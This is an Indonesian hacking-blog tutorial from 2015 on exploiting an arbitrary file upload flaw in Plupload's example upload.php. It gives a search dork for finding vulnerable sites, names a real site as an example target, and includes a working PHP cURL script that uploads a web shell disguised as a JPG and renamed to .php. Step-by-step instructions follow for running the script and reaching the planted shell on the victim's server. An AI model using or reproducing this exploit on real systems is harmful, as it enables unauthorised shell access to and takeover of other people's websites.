Thursday, 14 May 2015

Tutorial Plupload Arbitrary File Upload

xiixhix,, Nuenomaru disini .-.
dah lagi males basa basi

TKP:

Dork ~ inurl:/plupload/examples/

Exploit ~ www.target.com/[path]/plupload/examples/upload.php

Vulnerability ~ {"jsonrpc" : "2.0", "result" : null, "id" : "id"} 

Contoh : http://book-shelf.jp/plupload/examples/upload.php

Ubah Format Shell Kamu jadi format shell.jpg ~ Shell punya saya ~ chaYankVica.jpg 

Code PHP :

<?php

$url = "http://target.com/plupload/examples/upload.php"; // put URL Here
$post = array
(
       "file" => "@chaYankVica.jpg",
       "name" => "chaYankVica.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;

?>


save dengan format php.
ganti tulisan berwarna merah sesuai nama shell kalian >.<
ganti target.com dengan web target kalian


Langkah:

install xampp

taruh uploader nya di folder C:/xampp/php
save dengan format php ya
taruh juga shell kalian yang berformat jpg di C:/xampp/php

nyalakan xampp apache klik start 

buka cmd

ketikan:


cd C:/xampp/php
php plupload.php

enter dan nanti akan muncul jika done

Shell Acces : www.target.com/[path]/plupload/examples/uploads/shell.php

atau
Jadinya Seperti ini Dehhttp://target.com/plupload/examples/uploads/chaYankVica.php


Source and thanks to: Forum INCEF


./Nuenomaru

Nuenomaru just an illusion in Cyber World


Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2



EmoticonEmoticon